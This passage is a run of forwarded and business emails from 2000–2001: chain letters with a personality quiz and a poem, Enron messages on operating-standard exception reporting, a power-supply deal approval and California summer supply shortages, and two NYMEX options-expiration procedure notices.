nature. >> >> UNDER 21 POINTS: >> >> People think you are shy, nervous, and indecisive, someone who >>needs >> looking after, who always wants someone else to make the >>decisions and who >> doesn't want to get involved with anyone or anything.They see >>you as a >> worrier who always sees problems that don't exist. Some people >>think you're >> boring. Only those who know you well know that you aren't.Now >>forward this >> on to everyone you know, making sure to put >> YOUR score in the subject box! >> >> >> Work and worth never goes vain >> >> Regards >> >> Viji Madhukar >> Tesco India sourcing >> Ph No. 00 91 80 532 71 30 - 5 >> Fax No 00 91 80 532 48 05 >> homepage : http://www.tesco.com > > > _____ Get your FREE download of MSN Explorer at http://explorer.msn.com <http://go.msn.com/bql/hmtag_etl_EN.asp>. Regards, Dian Chu _____ Do You Yahoo!? Yahoo! Auctions <http://rd.yahoo.com/mail_us/tag/?http://auctions.yahoo.com> Great stuff seeking new owners! Bid now! <http://rd.yahoo.com/mail_us/tag/?http://auctions.yahoo.com>
>From: [email protected] >To: [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected] >Subject: Fwd: hey, girlfriends! >Date: Tue, 12 Dec 2000 04:30:16 EST > > Get more from the Web. FREE MSN Explorer download : http://explorer.msn.com Content-Transfer-Encoding: 7bit Return-Path: <[email protected]> Received: from rly-ye04.mx.aol.com (rly-ye04.mail.aol.com []) by air-ye04.mail.aol.com (v77.14) with ESMTP; Tue, 12 Dec 2000 02:34:21 -0500 Received: from secure.smtp.email.msn.com (cpimssmtpu07.email.msn.com []) by rly-ye04.mx.aol.com (v77.27) with ESMTP; Tue, 12 Dec 2000 02:34:14 -0500 Received: from oemcomputer - by email.msn.com with Microsoft SMTPSVC; Mon, 11 Dec 2000 23:33:56 -0800 Message-ID: <000801c0640d$da9f4f80$2389073e@oemcomputer> From: "thesymingtons" <[email protected]> To: "Maggie Symington" <[email protected]> Subject: hey, girlfriends! Date: Mon, 11 Dec 2000 17:15:45 -0000 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Something fun to read! > > I WANT WHAT SHE'S HAVING > > >>>> I have a new delightful friend, > > > > I am most in awe of her. > > > > When we first met I was impressed, > > > > By her bizarre behavior. > > > > > > > > That day I had a date with friends, > > > > We met to have some lunch. > > > > Mae had come along with them, > > > > All in all ... a pleasant bunch. > > > > > > > > When the menus were presented, > > > > We ordered salads, sandwiches, and soups. > > > > Except for Mae who circumvented, > > > > And said, Ice Cream, please: two scoops. > > > > > > > > I was not sure my ears heard right, > > > > And the others were aghast. > > > > Along with heated apple pie, > > > > Mae added, completely unabashed. > > > > > > > > We tried to act quite nonchalant, > > > > As if people did this all the time. > > > > But when our orders were brought out, > > > > I did not enjoy mine. > > > > > > > > I could not take my eyes off Mae, > > > > As her pie a-la-mode went down. > > > > The other ladies showed dismay, > > > > They ate their lunches silently, and frowned. > > > > > > > > Well, the next time I went out to eat, > > > > I called and invited Mae. > > > > My lunch contained white tuna meat, > > > > She ordered a parfait. > > > > > > > > I smiled when her dish I viewed, > > > > And she asked if she amused me. > > > > I answered, Yes, you do, > > > > But also you confuse me. > > > > > > > > How come you order rich desserts, > > > > When I feel I must be sensible? > > > > She laughed and said, with wanton mirth, > > > > I am tasting all that's possible. > > > > > > > > I try to eat the food I need, > > > > And do the things I should. > > > > But life's so short, my friend, indeed, > > > > I hate missing out on something good. > > > > > > > > This year I realized how old I was, > > > > She grinned, I've not been this old before. > > > > So, before I die, I've got to try, > > > > Those things for years I had ignored. > > > > > > > > I've not smelled all the flowers yet, > > > > There's too many books I have not read. > > > > There's more fudge sundaes to wolf down, > > > > And kites to be flown overhead. > > > > > > > > There are many malls I have not shopped, > > > > I've not laughed at all the jokes. > > > > I've missed a lot of Broadway Hits, > > > > And potato chips and cokes. > > > > > > > > I want to wade again in water, > > > > And feel ocean spray upon my face. > > > > Sit in a country church once more, > > > > And thank God for It's grace. > > > > > > > > I want peanut butter every day, > > > > Spread on my morning toast. > > > > I want un-timed long-distance calls, > > > > To the folks I love the most. > > > > > > > > I've not cried at all the movies yet, > > > > Nor walked in the morning rain. > > > > I need to feel wind in my hair, > > > > I want to fall in love again. > > > > > > > > So, if I choose to have dessert, > > > > Instead of having dinner. > > > > Then should I die before night fall, > > > > I'd say I died a winner. > > > > > > > > Because I missed out on nothing, > > > > I filled my heart's desire. > > > > I had that final chocolate mousse, > > > > Before my life expired. > > > > > > > > With that, I called the waitress over, > > > > I've changed my mind, it seems. > > > > I said, I want what she is having, > > > > Only add some more whipped-cream! > > > > > > > > Here is a little something for you all! > > > > We need an annual Girlfriends Day! > > > > If you get this twice, > > > > then you have more than one girlfriend. > > > > Be happy. > > > > > > > > ALL I NEED TO KNOW ABOUT LIFE I LEARNED FROM MY GIRLFRIENDS > > > > > > > > * Good times are even better when they're shared. > > > > * A good long talk can cure almost anything. > > > > * Everyone needs someone with whom to share their secrets. > > > > * Listening is just as important as talking. > > > > * An understanding friend is better than a therapist... > > > > and cheaper too! > > > > * Laughter makes the world a happier place. > > > > * Friends are like wine; they get better with age. > > > > * Sometimes you just need a shoulder to cry on. > > > > * Great minds think alike, especially when they are female! > > > > * When it comes to "bonding," females do it better. > > > > * YOU ARE NEVER TOO OLD FOR SLUMBER PARTIES!!!! > > > > * Girls just want to have fun. > > > > * It's important to make time to do "girl things." > > > > * Calories don't count when you are having lunch > > > > (or any other food) with your girlfriends. > > > > * You can never have too many shoes. > > > > * GEMS MAY BE PRECIOUS, BUT FRIENDSHIP IS PRICELESS!!! > > > > > > > > PLEASE PASS THIS ON TO ALL OF YOUR GIRLFRIENDS
Thanks for your comments on the standards. Our approach in creating a global exception reporting mechanism is to start simply and build from there. Our initial cut is to have effective exception reporting on a handful of critical standards by the end of this year. That will be a first, to on a daily basis have a view into the exceptions outside the global standards. Many of the measurements that you mention are great management tools for accessing the level of excellence of the services that we are delivering and the competence of those that are managing these services. Some of these may be more appropriately contained in a monthly operations report that I have instituted within ENA and which we are working to proliferate across all of the wholesale merchant services companies. Give me a call and we can set a time to get together for a few minutes and I can review this operating report with you. We spent some time at our offsite in late October with all operations controllers reviewing and discussing these standards. Shona has taken a stab at the format of these exception reports. It is likely that we will have a rep from each of the operating companies participate in the final design of these reports, so that all feel as if they own the intended output from these reports. Yes, we are gleaning this information from those that are responsible for these activities. My purpose is not to use this info to punish or prosecute, but instead to use this exception report as a tool to garner resources as needed to clear the exceptions. It is invariably the deals that are exceptions in some way that create the problems. For instance, small power deals that were done in Calgary before they had a power book set up. These were "on the side" and not captured in total power exposure because they didn't have a book to put them in (a discovery during the doorstep review). If this goes on the exception report, then we can highjack someone in risk in Houston to help Calgary set up a new book, or get IT resources focused quickly on any solution that may require their input to fix. By having a prescribed elevation of these exceptions, we should get the appropriate attention to correct them. The spur for making sure that all exceptions are appropriately noted, will be that if there is a problem with any deal that was an exception (not in the books, no confirm, etc.) and was not included on the exception report, that this will be grounds for termination for the appropriate operations controller. I will make sure that as we start this reporting process that this is well understood. The other impetus will be that during doorstep reviews the operational activities will be gauged against these standards. The AA internal audits should also access adherence to these. From: David Port @ ENRON 11/10/2000 01:46 PM To: Shona Wilson/NA/Enron@Enron cc: Sally Beck/HOU/ECT@ECT, Ted Murphy/HOU/ECT@ECT Subject: Fundamental Operating Standards This is the first time I have seen these - have they been rolled out ? I would be interested to see the format of the exception reporting that attaches to these standards that you mentioned - did you have anything particular in mind ? I had a few of my own ideas for some diagnostic measures of the extent to which these standards are being adhered to - see what you think: Transactions are recorded accurately and timely (completeness, accuracy) Daily report of "holdovers" by commodity group (trades not booked in time for daily cut - off, including counterparty, volume, price etc) Report of P&L effect of booking errors as they transpire, including responsibility Daily Management P&L and Position reporting is accurate and timely (completeness, accuracy) Periodic qualitative review by RAC (i.e. Is it sufficient by reference to the Risk Management Policy - does it show delta gamma vega as a term structure etc....) NB: the point about "Reports issued on next day of trading at a commercially pre-determined time" conflicts with the Risk Managemet Policy, which says "...before any subsequent trading ocurrs". I think the diagnostic measure should be, for each commodity DPR a report daily of all those signed off as final (note I do not neccessarily mean "officialized") after the relevant market opening time (usuaully 7.30 am) Timely confirmation and execution of transactions (completeness, accuracy, existence) Monthly report of all unmatched confirmations: - outstanding inward confirmations (i.e. sent out, not signed) - outstanding outward confirmations (i.e deal done, confirm not sent) - outstanding mismatched or disputed confirmations showing deal trade date, start date, commodity, counterparty, MTM value, aged Settlements with counterparties occurs accurately and timely (non CACS, non Dashed deals) Monthly report of cumulative amounts of all unmatched or unapplied cash: Unapplied cash by counterparty, in original denomination, including deal reference if any Unmatched amounts by deal, where settled amount differs from maturing forward MTM value One additional thing that ocurred to me was the fact that those responsible for supplying the information are also those responsible for the operation underlying it in some sense, so the obvious pitfalls of self - assessment will come into play here. Perhaps the "pilot" report should be put together somehow independently. Views ? DP
Notice No. 01-75 March 5, 2001 TO: All NYMEX Division Members/Member Firms All NYMEX Division Clearing Members All NYMEX Division Floor Traders All NYMEX Division Operations Managers FROM: George Henderson, Vice President RE: Options Expiration Operational Procedures for the Trading Floor and Clearing Members ________________________________________________________________ The expiration date for the April 2001 options contract for Platinum (POJ1) is Friday, March 9, 2001. GENERAL OPERATIONAL PROCEDURES All Clearing Members and Qualified Floor Traders that carried an options position as of the close of business day prior to the expiration day, or engaged in trading activity on Expiration Day in the expiring options contract will be required to have a knowledgeable, duly authorized representative present at their normal work station promptly at 5:30 p.m. until released by the Exchange staff as specified below. All adjustments and/or corrections, must be accompanied by relevant supporting documentation prior to being incorporated into expiration processing, in essence making the expiration processing an extension of the afternoon trade resolution procedures. All input to the NYMEX Clearing Department will conclude no later than 30 minutes after floor representatives are released. Exchange Clearing (299-2110), Floor Trade Correction (299-2068 and 299-2169) personnel, as well as a representative of the Floor Committee will be available to assist with the processing of notices of Exercise and Abandonment, position transfers, trade corrections and other questions or problems you may have. CLEARING DEPARTMENT OPERATIONAL PROCEDURES The Option Expiration process is a screen based process for which all information is provided on the screens on C21 terminals. No Option Expiration Reports will be provided. The following screens will assist you through the Option Expiration process: MEMBER TRADE INQUIRY Contains real-time top day trade information, trade information for the previous 4 business days and trades adjusted for the previous 4 business days by adjustment date. SINGLE POSITION MAINTENANCE Contains a real-time snapshot for each option series from the start of day position to the projected end of day position. REVIEW ACCEPT REJECT TRANSFERS Contains all trade and position transfers "TO" your firm and the status of each transfer. REVIEW SUBMITTED TRANSFERS Contains all trade and position transfer "FROM" your firm and the status of each transfer. EXERCISE NOTICE SUBMISSION Contains your available long position and an input field to enter the number of long positions you wish to exercise. DO NOT EXERCISE SUBMISSION Contains your available long position and an input field to enter the number of long positions you wish to abandon. POSITION CHANGE SUBMISSION PCS may be submitted either by manual input or by electronic transmission. Any PCS input on a Clearing 21 terminal will be the input processed by the system. This input may be made at any time prior to 6:45 p.m. Any PCS input via transmission for that contract series will be disregarded. ALL POSITIONS ARE DEEMED FINAL Upon completion of all PCS input, all positions will be deemed final. EXERCISE/ASSIGNMENT INFORMATION Will be available to you on the Single Position Maintenance window by contract series or the Assignment List window which contains all your Assignments on one window. You will be notified of its availability by C21 E-Mail and by Fast Facts. This should occur within 1 hour of the last PCS input. All Clearing Members are required to have an authorized representative(s) at their C21 workstations in preparation for any communication during the expiration process. FAST FACTS Clearing Members should call the Fast Facts information service 301-4871, access code 700 for event messages advising Members of the event status. E-MAIL Clearing Members should read their C21 E-Mail messages immediately to be aware of event status. The standard event Fast Facts and/or E-Mail messages and the sequence in which they will be announced are: Standard Event Message: Announce Out-of-the Money Exercise and In-the-Money Do Not Exercise Submissions Approximate Time of Message Availability: 5:45 PM Usual Event Time: 5:45 PM Announced via Fast Facts Standard Event Message: Announce Final Input to C21 Cutoff Time Approximate Time of Message Availability: 6:30 PM Usual Event Time: 6:45 PM Announced via e-mail Standard Event Message: All positions are deemed final Approximate Time of Message Availability: 7:30 PM Usual Event Time: 6:45 PM Announced via Fast Facts Standard Event Message: Announce Exercise/Assignment Information Available on the Single Position Maintenance Windows Approximate Time of Message Availability: 8:25 PM Usual Event Time: 8:30 PM Announced via Fast Facts and e-mail Standard Event Message: All Report Distribution is completed Approximate Time of Message Availability: 11:00 PM Usual Event Time: 11:00 PM Announced via Fast Facts The times appearing in the Usual Event Time column are based on normal operational conditions and could vary. NYMEX EXPIRATION DAY PROCESSING OVERVIEW OF MEMBER REQUIREMENTS Time: 5:30 PM Activity: Exercise Notice Submission Event: Input to C21 Cutoff Time Reference Number: 1 Time: 5:30 PM Activity: Do Not Exercise Submission Event: Input to C21 Cutoff Time Reference Number: 2 Time: 5:45 PM Activity: Announce Out-of-the-Money Exercise and In-the-Money Do Not Exercise Submissions Event: Fast Facts Notice Reference Number: 3 Time: 6:30 PM Activity: Announce Final Input to C21 Cutoff Time Event: C21 E-mail Reference Number: 4 Time: 6:45 PM Activity: Final Input to C21 Cutoff Time Reference Number: 5 Time: 7:30 PM Activity: All Positions are Deemed Final Event: Fast Facts Notice Reference Number: 6 Time: 8:25 PM Activity: Announce Exercise/Assignment Information Available on the Single Position Maintenance Windows Event: Fast Facts Notice and C21 E-mail Reference Number: 7 If you have any questions concerning these procedures, please contact Charles V. Bebel at 299-2130, Angel Rivera at 299-2150 or Anthony Di Benedetto at 299-2152 prior to the expiration date. __________________________________________________ Please click on the link below to indicate you have received this email. "[email protected]&refdo c=(01-75)" Note: If you click on the above line and nothing happens, please copy the text between the quotes, open your internet browser, paste it into the web site address and press Return.
Guys, do we have enough VAR to bring this position into the book? If over $5M in total exposure it has to go to Frevert/Whalley. John, I assume that you have gone through the transaction and have approved. Regards Delainey ---------------------- Forwarded by David W Delainey/HOU/ECT on 02/01/2001 12:20 PM --------------------------- Janice R Moore 02/01/2001 09:06 AM To: Janet R Dietrich/HOU/ECT@ECT cc: Berney C Aucoin/HOU/ECT@ECT, Daniel Allegretti/NA/Enron@Enron, David Gorte/HOU/ECT@ECT, David V Porter/PDX/ECT@ECT, David W Delainey/HOU/ECT@ECT, Elizabeth Sager/HOU/ECT@ECT, Frank Hayden/Corp/Enron@Enron, George Wood/Corp/Enron@Enron, Jeffery Ader/HOU/ECT@ECT, Jim Meyn/NA/Enron@Enron, John J Lavorato/Enron@EnronXGate, John Llodra/Corp/Enron@ENRON, Kevin M Presto/HOU/ECT@ECT, LaCrecia Davenport/Corp/Enron@Enron, Mark Dana Davis/HOU/ECT@ECT, Mark E Haedicke/HOU/ECT@ECT, Richard Shapiro/NA/Enron@Enron, Rick Buy/HOU/ECT@ECT, Tracy Ngo/PDX/ECT@ECT, Zachary Sampson/NA/Enron@ENRON, Janette Elbertson/HOU/ECT@ECT Subject: Re: Draft DASH for CMP Standard Offer Deal And here's the risk memo on this deal. Still in draft form and based on the state of play at the moment. Regards, Janice EB3861 Assistant General Counsel, Enron North America Corp. 713-853-1794 (Fax: 713-646-4842) Janet R Dietrich 01/31/2001 04:34 PM To: John Llodra/Corp/Enron@ENRON cc: Jeffery Ader/HOU/ECT@ECT, George Wood/Corp/Enron@Enron, Kevin M Presto/HOU/ECT@ECT, Mark Dana Davis/HOU/ECT@ECT, Berney C Aucoin/HOU/ECT@ECT, Jim Meyn/NA/Enron@Enron, Richard Shapiro/NA/Enron@Enron, Daniel Allegretti/NA/Enron@Enron, David W Delainey/HOU/ECT@ECT, John J Lavorato/Corp/Enron, David V Porter/PDX/ECT@ECT, Rick Buy/HOU/ECT@ECT, David Gorte/HOU/ECT@ECT, Janice R Moore/HOU/ECT@ECT, Mark E Haedicke/HOU/ECT@ECT, Elizabeth Sager/HOU/ECT@ECT, Frank Hayden/Corp/Enron@Enron, LaCrecia Davenport/Corp/Enron@Enron, Zachary Sampson/NA/Enron@ENRON, Tracy Ngo/PDX/ECT@ECT Subject: Draft DASH for CMP Standard Offer Deal John, thanks for the update. I sat down with John Lavorato and Dana Davis this morning to review the deal and get John's approval under the current terms. He has approved the deal in it's current form however, to the extent that we have any material change in the terms I'll need to be sure he's OK with the changes in advance of any binding committment with Central Maine. This is definitely a deal we want to do and given the anticipated acceleration in the negotiations and possible execution, we need to be sure that we're able to react and transact quickly. Dana Davis is obviously on point for all pricing. For all others who have involvement here - please ensure that you're on board with your piece of the deal as is, and available to focus on any negotiated changes that may come up over the next couple of days. Berney Aucoin will be on point for coordinating and managing all internal pricing, approvals, etc., so be sure that Bernie can get ahold of you if he needs to. Also, for the DASH signatures, why don't you move both Kevin and I to "Regional Management" and let Ader and Davis sign for Origination and Trading. Thanks and good luck! ---------------------- Forwarded by Janet R Dietrich/HOU/ECT on 01/31/2001 03:51 PM --------------------------- John Llodra@ENRON 01/31/2001 11:50 AM To: Jeffery Ader/HOU/ECT@ECT, George Wood/Corp/Enron@Enron, Kevin M Presto/HOU/ECT@ECT, Mark Dana Davis/HOU/ECT@ECT, Berney C Aucoin/HOU/ECT@ECT, Jim Meyn/NA/Enron@Enron, Richard Shapiro/NA/Enron@Enron, Daniel Allegretti/NA/Enron@Enron, David W Delainey/HOU/ECT@ECT, John J Lavorato/Corp/Enron, Janet R Dietrich/HOU/ECT@ECT, David Port/Market Risk/Corp/Enron@ENRON, Rick Buy/HOU/ECT@ECT, David Gorte/HOU/ECT@ECT, Janice R Moore/HOU/ECT@ECT, Mark E Haedicke/HOU/ECT@ECT, Elizabeth Sager/HOU/ECT@ECT, Frank Hayden/Corp/Enron@Enron, LaCrecia Davenport/Corp/Enron@Enron, Zachary Sampson/NA/Enron@ENRON, Tracy Ngo/PDX/ECT@ECT cc: Subject: Draft DASH for CMP Standard Offer Deal All: As some of you may be aware, we are in the process of negotiating with Central Maine Power Company regarding the assumption of a portion of their wholesale obligations associated with their Standard Offer Service load in the State of Maine, covering at least March 1, 2001 - Feb 28, 2002. We are currently in the process of negotiating a contract and transaction terms. They are simultaneously discussing same with other suppliers. At this point, there are a number of outstanding items (including numerous contract items and credit arrangements). However, we expect that the pace of the negotiation process will be very quick over the next 1-3 days. As an example of how quickly things might move, CMP has indicated that the Maine PUC is poised to hold deliberations and approve CMP's signing of a contract within 24 hours of CMP/Enron agreement on contract terms (with updated firm pricing to be supplied just prior to PUC deliberations and held open for about 2-3 hours). Key members of our negotiating team on this deal are as follows: Origination/Marketing: John Llodra, George Wood Legal: Janice Moore Regulatory/Governmental: Daniel Allegretti Commodity Structuring: Jim Meyn, Zach Sampson Credit: Edward Sacks, Tracy Ngo Attached below is a draft of the DASH for this prospective deal. Items subject to change or still under negotiation are noted. While this DASH is prepared assuming we obtain a multi-year extension swaption, there is a chance it may end up being a single year deal for the period Mar 1, 01- Feb 28, 02. My intent in sending the DASH at this time is to familiarize you all with the aspects of the deal at this point in time, to enable us to move quickly to get internal approvals in the event we reach final agreement with CMP over the next couple of days. Once agreement is reached with CMP on outstanding items, a revised DASH will be circulated. Please feel free to call me at 978-449-9936, or Jim Meyn/Berney Aucoin in structuring (5-3223, 3-4784) if you have any questions on the commercial structure or valuation to date. Thanks. Regards John
----- Forwarded by Steven J Kean/NA/Enron on 02/28/2001 02:22 PM ----- James D Steffes 02/26/2001 08:52 AM To: Alan Comnes/PDX/ECT@ECT, Chris H Foster/HOU/ECT@ECT, Christian Yoder/HOU/ECT@ECT, Christopher F Calger/PDX/ECT@ECT, Cynthia Sandherr/Corp/Enron@ENRON, Dan Leff/HOU/EES@EES, David W Delainey/HOU/ECT@ECT, Dennis Benevides/HOU/EES@EES, Don Black/HOU/EES@EES, Elizabeth Sager/HOU/ECT@ECT, Elizabeth Tilney/HOU/EES@EES, Eric Thode/Corp/Enron@ENRON, Gordon Savage/HOU/EES@EES, Greg Wolfe/HOU/ECT@ECT, Harry Kingerski/NA/Enron@Enron, Jubran Whalan/HOU/EES@EES, Jeff Dasovich/NA/Enron@Enron, Jeffrey T Hodge/HOU/ECT@ECT, Joe Hartsoe/Corp/Enron@ENRON, John J Lavorato/Corp/Enron@Enron, John Neslage/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Kathryn Corbally/Corp/Enron@ENRON, Keith Holst/HOU/ECT@ect, Kristin Walsh/HOU/ECT@ECT, Leslie Lawner/NA/Enron@Enron, Linda Robertson/NA/Enron@ENRON, Louise Kitchen/HOU/ECT@ECT, Marcia A Linton/NA/Enron@Enron, Mary Schoen/NA/Enron@Enron, [email protected], Mark Palmer/Corp/Enron@ENRON, Marty Sunde/HOU/EES@EES, Mary Hain/HOU/ECT@ECT, Michael Tribolet/Corp/Enron@Enron, Mike D Smith/HOU/EES@EES, Mike Grigsby/HOU/ECT@ECT, Neil Bresnan/HOU/EES@EES, Paul Kaufman/PDX/ECT@ECT, Phillip K Allen/HOU/ECT@ECT, Robert Badeer/HOU/ECT@ECT, Rebecca W Cantrell/HOU/ECT@ECT, Richard B Sanders/HOU/ECT@ECT, Richard Shapiro/NA/Enron@Enron, Rob Bradley/Corp/Enron@ENRON, Robert C Williams/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Robert Frank/NA/Enron@Enron, Robert Frank/NA/Enron@Enron, Robert Johnston/HOU/ECT@ECT, Robert Neustaedter/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Sandra McCubbin/NA/Enron@Enron, Scott Stoness/HOU/EES@EES, Shelley Corman/Enron@EnronXGate, Steve C Hall/PDX/ECT@ECT, Steve Walton/HOU/ECT@ECT, Steven J Kean/NA/Enron@Enron, Susan J Mara/NA/Enron, Tim Belden/HOU/ECT@ECT, Tom Briggs/NA/Enron@Enron, Travis McCullough/HOU/ECT@ECT, Vance Meyer/NA/Enron@ENRON, Vicki Sharp/HOU/EES@EES, Wendy Conwell/NA/Enron@ENRON, William S Bradford/HOU/ECT@ECT cc: Subject: CA Supply Realities For those that have not seen this analysis, attached please find a note from Mary Schoen detailing the serious physical shortage problems that may occur this Summer in CA. Jim ----- Forwarded by James D Steffes/NA/Enron on 02/26/2001 08:51 AM ----- Mary Schoen 02/22/2001 02:55 PM To: Neil Bresnan/HOU/EES@EES, Alan Comnes/PDX/ECT@ECT, Jubran Whalan/HOU/EES@EES, Kristin Walsh/HOU/ECT@ECT, Clayton Seigle/HOU/ECT@ECT, Jeffrey Keeler/Corp/Enron@ENRON, James D Steffes/NA/Enron@Enron, Harry Kingerski/NA/Enron@Enron, Richard Shapiro/NA/Enron@Enron, Janel Guerrero/Corp/Enron@Enron, Jeff Dasovich/NA/Enron@Enron, Sandra McCubbin/NA/Enron@Enron, Susan J Mara/NA/Enron@ENRON, Paul Kaufman/PDX/ECT@ECT cc: Subject: CA Supply Realities Attached is a memo comparing the CEC's forecasted supply and a more realistic look at what additional resources might be available this summer. The bottom line is that: 1. The CEC significantly underestimates the outages that may occur this summer. They estimate in their 5,000 MW supply deficit for the summer that expected outages will be around 3,000MW. However, November and December saw significantly higher outage levels. (7,265 MWs) The FERC has investigated these outages and found no improprieties- just that the plants are overtaxed from running at higher than normal capacities. 2. There are a lot of uncertainties surrounding the 1,244 MWs of projected supply from rerating/restarting existing thermal and renewable projects. It is very unclear how much of this will be able to come on line by this summer, if at all. As evidenced by the e-mail I sent out this morning, local communities may be very opposed to restarting shut down units. In addition, these units are likely to be uneconomical. 3. In the existing resource pool, there are roughly 1,430 MWs of peaking or other generation units that are running up against their operating hour limitations from air quality regulations. The Governor has ordered the local air quality districts to address these restrictions, We are beginning to seem some movement; however, the US EPA has yet to weigh in on these relaxed standards. 4. The distributed generation/back-up generation capacity to make up some of the shortfall is still an unknown. While there has been some relaxing of the limitations on run hours for back-up generation at "essential public services" the increase in DG is expected from "clean" sources, not diesel emergency generators. 5. The CEC is doing everything it can to get 50+ MW peaking units on-line by this summer. They are promising a 21-day permit application approval process and are offering to pay half of the cost of offsets, for "clean" sources of generation in critical areas. Please let me know if you have any questions or need additional information. CEC's Summer Forecasted Peak Demand - Resource Balance: List of Peakers running into their operating hour limitations: Also available in hard copy format only: (please e-mail me your fax number if you'd like a copy) Table 1: Fully Executed CA ISO Summer Reliability Agreements (the ISO Peaking Facilities) Table 2: Summer 2001 Supply Options - Renewables Construction Status Summary Table 3: Summer 2001 Supply Options - Rerate of Non-CEC Projects Table 4: Summer 2001 Supply Options - CEC Rerate Status Summary Table 5: Idle Biomass Plants Potentially Capable of Restart Mary Schoen Environmental Strategies Enron Corp 713-345-7422
Notice No. 00-329 September 20, 2000 TO: All NYMEX Members/Member Firms All NYMEX Clearing Members All NYMEX Floor Traders All NYMEX Operations Managers FROM: Neal Wolkoff, Executive Vice President RE: Options Expiration Operational Procedures for the Trading Floor and Clearing Members The expiration date for the October 2000 options contract for Unleaded Gasoline (GOV0), Heating Oil (OHV0) and Natural Gas (ONV0) is Tuesday, September 26, 2000. GENERAL OPERATIONAL PROCEDURES All Clearing Members and Qualified Floor Traders that carried an options position as of the close of business day prior to the expiration day, or engaged in trading activity on Expiration Day in the expiring options contract will be required to have a knowledgeable, duly authorized representative present at their normal work station promptly at 5:30 p.m. until released by the Exchange staff as specified below. All adjustments and/or corrections, must be accompanied by relevant supporting documentation prior to being incorporated into expiration processing, in essence making the expiration processing an extension of the afternoon trade resolution procedures. All input to the NYMEX Clearing Department will conclude no later than 30 minutes after floor representatives are released. Exchange Clearing (299-2110), Floor Trade Correction (299-2068 and 299-2169) personnel, as well as a representative of the Floor Committee will be available to assist with the processing of notices of Exercise and Abandonment, position transfers, trade corrections and other questions or problems you may have. CLEARING DEPARTMENT OPERATIONAL PROCEDURES The Option Expiration process is a screen based process for which all information is provided on the screens on C21 terminals. No Option Expiration Reports will be provided. The following screens will assist you through the Option Expiration process: MEMBER TRADE INQUIRY Contains real-time top day trade information, trade information for the previous 4 business days and trades adjusted for the previous 4 business days by adjustment date. SINGLE POSITION MAINTENANCE Contains a real-time snapshot for each option series from the start of day position to the projected end of day position. REVIEW ACCEPT REJECT TRANSFERS Contains all trade and position transfers "TO" your firm and the status of each transfer. REVIEW SUBMITTED TRANSFERS Contains all trade and position transfer "FROM" your firm and the status of each transfer. EXERCISE NOTICE SUBMISSION Contains your available long position and an input field to enter the number of long positions you wish to exercise. DO NOT EXERCISE SUBMISSION Contains your available long position and an input field to enter the number of long positions you wish to abandon. POSITION CHANGE SUBMISSION PCS may be submitted either by manual input or by electronic transmission. Any PCS input on a Clearing 21 terminal will be the input processed by the system. This input may be made at any time prior to 7:10 p.m. Any PCS input via transmission for that contract series will be disregarded. ALL POSITIONS ARE DEEMED FINAL Upon completion of all PCS input, all positions will be deemed final. EXERCISE/ASSIGNMENT INFORMATION Will be available to you on the Single Position Maintenance window by contract series or the Assignment List window which contains all your Assignments on one window. You will be notified of its availability by C21 E-Mail and by Fast Facts. This should occur within 1 hour of the last PCS input. All Clearing Members are required to have an authorized representative(s) at their C21 workstations in preparation for any communication during the expiration process. FAST FACTS Clearing Members should call the Fast Facts information service 301-4871, access code 700 for event messages advising Members of the event status. E-MAIL Clearing Members should read their C21 E-Mail messages immediately to be aware of event status. The standard event Fast Facts and/or E-Mail messages and the sequence in which they will be announced are: Standard Event Message: Announce Out-of-the Money Exercise and In-the-Money Do Not Exercise Submissions Approximate Time of Message Availability: 5:45 PM Usual Event Time: 5:45 PM Announced via Fast Facts Standard Event Message: Announce Final Input to C21 Cutoff Time Approximate Time of Message Availability: 6:55 PM Usual Event Time: 7:10 PM Announced via e-mail Standard Event Message: All positions are deemed final Approximate Time of Message Availability: 7:10 PM Usual Event Time: 7:10 PM Announced via Fast Facts Standard Event Message: Announce Exercise/Assignment Information Available on the Single Position Maintenance Windows Approximate Time of Message Availability: 8:25 PM Usual Event Time: 8:30 PM Announced via Fast Facts and e-mail Standard Event Message: All Report Distribution is completed Approximate Time of Message Availability: 11:00 PM Usual Event Time: 11:00 PM Announced via Fast Facts The times appearing in the Usual Event Time column are based on normal operational conditions and could vary. NYMEX EXPIRATION DAY PROCESSING OVERVIEW OF MEMBER REQUIREMENTS Time: 5:30 PM Activity: Exercise Notice Submission Event: Input to C21 Cutoff Time Reference Number: 1 Time: 5:30 PM Activity: Do Not Exercise Submission Event: Input to C21 Cutoff Time Reference Number: 2 Time: 5:45 PM Activity: Announce Out-of-the-Money Exercise and In-the-Money Do Not Exercise Submissions Event: Fast Facts Notice Reference Number: 3 Time: 6:55 PM Activity: Announce Final Input to C21 Cutoff Time Event: C21 E-mail Reference Number: 4 Time: 7:10 PM Activity: Final Input to C21 Cutoff Time Reference Number: 5 Time: 7:10 PM Activity: All Positions are Deemed Final Event: Fast Facts Notice Reference Number: 6 Time: 8:25 PM Activity: Announce Exercise/Assignment Information Available on the Single Position Maintenance Windows Event: Fast Facts Notice and C21 E-mail Reference Number: 7 If you have any questions concerning these procedures, please contact Charles V. Bebel at 299-2130, Angel Rivera at 299-2150 or Anthony Di Benedetto at 299-2152 prior to the expiration date. __________________________________________________ Please click on the link below to indicate you have received this email. "[email protected]& refdoc=(00-329) Options Expiration for GOV0, OHV0, and ONV0" Note: If you click on the above line and nothing happens, please copy the text between the quotes, open your internet browser, paste it into the web site address and press Return.
